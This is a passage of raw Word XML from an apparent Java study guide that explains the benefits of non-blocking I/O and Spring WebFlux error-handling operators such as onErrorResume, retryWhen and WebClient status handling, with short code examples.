          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331709C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blocking a thread to wait for a database query result, the thread can be used to handle other tasks (like processing other requests) until the database response is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE511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Improved Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD98B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non-blocking I/O, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can handle multiple I/O requests concurrently by using asynchronous methods. This is especially beneficial for handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a large number of concurrent users</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0741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requires creating multiple threads (one per I/O request), which can quickly exhaust system resources as the number of requests grows. With non-blocking I/O, fewer threads are needed, and the system can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more requests</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ess resource consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423350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Faster Response Time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3E9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Non-blocking operations enable faster processing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple concurrent tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which leads to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for users, especially in web applications, APIs, or real-time applications that require low-latency responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D89F7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Improved Throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A2AC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ncreases the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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high-traffic web application, non-blocking I/O allows the server to process more HTTP requests per second because it doesn’t spend time waiting for responses from the database, files, or APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C5553"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etter User Experience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E209E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leads to a more responsive application, enhancing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Since the server can quickly respond to other requests while waiting for I/O operations, users can interact with the system more seamlessly, leading to lower perceived latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A19D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real-time applications like messaging, notifications, or live data feeds, non-blocking I/O ensures that updates happen instantly without delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1500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essaging app can receive and send messages in real-time without delays, even when the backend performs other tasks such as saving data to the database or fetching data from external APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6090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mproved Fault Tolerance and Resilience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54A0E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system using non-blocking I/O, the application can continue processing tasks even if some operations are slow or fail, instead of blocking and waiting for each I/O operation to complete sequentially. This improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and makes the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE0F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I/O operation takes too long (e.g., a network call), the system can continue to process other requests without being stalled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C90D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icroservice application with multiple external API calls can continue processing other tasks even if one API is temporarily slow or unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EADC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Better Handling of Slow Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E75C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particularly useful when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Increased Responsiveness in Real-time Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27B08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ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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stock trading app, non-blocking I/O ensures that the user interface can be updated with live data without any delays, even when receiving continuous updates from external data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680A4F9"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5A38">
          <v:rect id="_x0000_i2309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="304598D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904FB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enhances application performance by making it more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient, 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ponsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It minimizes thread contention and resource waste by allowing the application to handle multiple concurrent I/O operations without blocking threads. This results in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er throughpu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better user experiences</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Non-blocking I/O is especially beneficial in high-traffic, real-time, or distributed systems where concurrency and latency are critical factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7CDD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310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A14106" w14:textId="38D2A6F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8" w:name="_Toc197867742"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle error handling in a reactive pipeline</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p w14:paraId="45E6149C" w14:textId="3A1C9D4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ing onErrorReturn() for Fallback Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB60A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error occurs in a reactive stream, you can use onErrorReturn() to return a fallback value instead of propagating the error. This is useful for providing a default value in case of errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A70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07630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lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01336F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2D4DDAF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encounters an error, it will return "Fallback Value" instead of propagating the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6E68B"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ing onErrorResume() for Fallback Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35571E2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F52ED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B6A7FB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1FCD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different fallback Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CFB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Alternative Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091D69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5E1B49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when an error occurs in getDataFromService(), it logs the error and provides an alternative fallback value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA1A5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Using doOnError() to Log Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20313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C6906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242A65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Error(e -&gt; log.error("Error occurred: ", e));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098DE1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logs the error but does not alter the flow or output of the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309E29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Using onErrorMap() to Transform Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D460EC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434F8C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DBB58B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OriginalException.class, ex -&gt; new CustomException("Transformed Error", ex));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747F1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throws an OriginalException, it is mapped to a CustomException to provide more meaningful error information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0D4BFD"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ing retry() for Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28D9A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294C9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110A59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up to 3 times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A9B0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getDataFromService() fails, it will retry up to 3 times before propagating the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E89E86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ing retryWhen() for Conditional Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6A71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yWhen() allows for more complex retry logic, like retrying based on specific error conditions or introducing delays between retries. It gives you more flexibility in handling retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736503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0535166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0AA119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When(Retry.backoff(3, Duration.ofSeconds(1)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770A3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the operation is retried up to 3 times, with a backoff period of 1 second between retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C0A7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 in WebFlux Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B13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controllers, you can use @ExceptionHandler to handle errors globally or per controller. It’s similar to Spring MVC’s exception handling mechanism, but designed for non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D561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013766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5B18EE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67C50791" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC02D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data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0A3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Data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83946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someService.getData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1705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e -&gt; new CustomException("Error fetching data", e));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E83A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2E8327" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6A39F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eptionHandler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DD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ResponseEntity&lt;String&gt;&gt; handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63356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ResponseEntity.status(HttpStatus.BAD_REQUEST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65053FE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ex.getMessage()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15709E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707B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244EA6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the @ExceptionHandler method will handle CustomException and return an appropriate HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1030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Using doOnTerminate() for Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DF15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Terminate() is useful for performing cleanup or resource release tasks when the reactive stream finishes (either successfully or with an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F9F1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967407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09222D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Stream completed"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F41912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print a message whenever the stream terminates, regardless of whether it completed successfully or with an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BBD00"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Error Handling in WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E65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making HTTP requests using WebClient in Spring WebFlux, you can handle errors by using .onStatus() to check for specific HTTP status codes and respond accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC776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818DD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FDB20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BA4AC5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77527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4xxClientError, response -&gt; Mono.error(new ClientErrorException("Client error")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AF1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5xxServerError, response -&gt; Mono.error(new ServerErrorException("Server error")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BCFE0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0E69153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specific exceptions are thrown based on the HTTP status code returned from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F1F24"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4B4014">
          <v:rect id="_x0000_i2311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A8B3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3CFB561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logging, transforming errors, and defining fallback logic—all crucial for building resilient and responsive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695BF2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312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D23D11" w14:textId="41F1FE8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9" w:name="_Toc197867743"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is onErrorResume() and how does it work</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w14:paraId="7D8AFB72" w14:textId="13FDEF5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sume() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7DC2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sume() allows you to react to the error and switch to another Mono or Flux (fallback logic), without terminating the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25483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perator provides a fallback value or a new reactive stream to continue the flow, ensuring that the overall operation does not terminate with an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5038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an be used when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529379A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want to recover from an error and continue processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE297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rovide an alternative flow when a specific error is encountered (e.g., a network failure or an exception thrown).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79D6D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2F3375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sume(Function&lt;Throwable, ? extends Mono&lt;? extends T&gt;&gt; fallback);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642165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fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A function that takes the exception (Throwable) and returns a new Mono (or Flux) that will be emitted when an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C084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A160F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is an example to illustrate how onErrorResume() works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C1E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80424AE" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FFE87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11864BD1" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68174C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60EFA65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64CD74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38F2C0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fallback value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D87FD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Error occurred: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB7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Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6CF7E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6F9417" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209106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76A5F1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1C0C8" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EDA1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6B58C9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48480FB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F8FF8B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45230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745E87C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698AF5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sume() operator catches the error and returns a new Mono.just("Fallback Value") as a fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130252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original error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35988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22897B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onErrorResume() is useful when you want to handle specific errors gracefully and continue the processing of the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50C4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a New Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The fallback you return from onErrorResume() should be a new Mono or Flux. It doesn't just return a value—it allows you to define a new stream that will replace the failed one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E98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n Handle Specific Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use onErrorResume() to handle specific exceptions by checking the type of exception in the lambda function and returning different fallbacks depending on the type of error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484C1B9"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Conditional Fallback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408C6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FC6267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E34D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e instanceof NetworkException) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDE9F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fallback Mono for network-related errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E052B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twork Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A236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180BF8E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different fallback for other types of exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57DC3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Generic Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA88D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36942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DEF48F" w14:textId="77777777" w:rsidR="00EA0E86" w:rsidRPr="00B13F85" w:rsidRDefault="00EA0E86" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085901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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD4FC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f a NetworkException occurs, the fallback will be "Network Fallback Value". For other errors, it will return "Generic Fallback Value".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA401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onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA629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covery from Transient Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, network failures or temporary issues where retrying with an alternative value or a secondary resource is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300419D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Substitution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to continue processing with some default or alternative data if the original operation fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FF35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viding Fallback Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In scenarios where continuing the flow with fallback data is necessary (e.g., when calling a remote service that might fail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04065CB2"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637BA3">
          <v:rect id="_x0000_i2313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ECC3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314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2695BA84" w14:textId="798B170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0" w:name="_Toc197867744"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
